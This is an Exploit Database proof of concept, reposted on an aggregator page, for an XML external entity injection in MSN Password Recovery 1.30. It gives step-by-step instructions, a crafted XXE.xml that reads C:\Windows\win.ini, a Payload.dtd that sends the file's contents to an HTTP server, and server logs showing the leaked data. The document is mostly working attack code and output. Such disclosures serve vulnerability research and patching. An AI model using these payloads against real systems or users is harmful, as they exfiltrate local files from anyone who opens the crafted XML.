MSN Password Recovery 1.30 – XML External Entity Injection

• Exploit Database
• 14 阅读

• 作者： ZwX
  日期： 2020-01-09
• 类别：

  • local
  平台：

  • xml
• 来源：https://www.exploit-db.com/exploits/47896/

• # Exploit Title: MSN Password Recovery 1.30 - XML External Entity Injection
  # Exploit Author: ZwX
  # Exploit Date: 2020-01-08
  # Vendor Homepage : https://www.top-password.com/
  # Software Link: https://www.top-password.com/download/MSNPRSetup.exe
  # Tested on OS: Windows 10
  
  
  [+] Exploit : (PoC)
  ===================
  1) python -m SimpleHTTPServer 8000
  2) Create file (.xml)
  3) Create file Payload.dtd
  4) Open the software MSN Password Recovery
  5) Click the 'Help' button and a 'Msn Password Recovery' window opens
  6) Click the 'Favorites' tab and add in Path Current the path of your file (.XML) Ex : file:///C:/Users/ZwX/Desktop/file.xml
  7) Click the 'View' button
  8) External Entity Injection Successful
  
  
  [+] XXE.xml :
  ==============
  <?xml version="1.0"?>
  <!DOCTYPE test [
  <!ENTITY % file SYSTEM "C:\Windows\win.ini">
  <!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
  %dtd;]>
  <pwn>&send;</pwn>
  
  [+] Payload.dtd :
  =================
  <?xml version="1.0" encoding="UTF-8"?>
  <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
  %all;
  
  
  [+] Result Exploitation :
  =========================
  C:\>python -m SimpleHTTPServer 8000
  Serving HTTP on 0.0.0.0 port 8000 ...
  ZwX-PC - - [08/Jan/2020 20:32:36] "GET /payload.dtd HTTP/1.1" 200 -
  ZwX-PC - - [08/Jan/2020 20:32:37] "GET /?;%20for%2016-bit%20app%20support[fonts][extensions][mci%20extensions][files][Mail]MAPI=1 HTTP/1.1" 200 -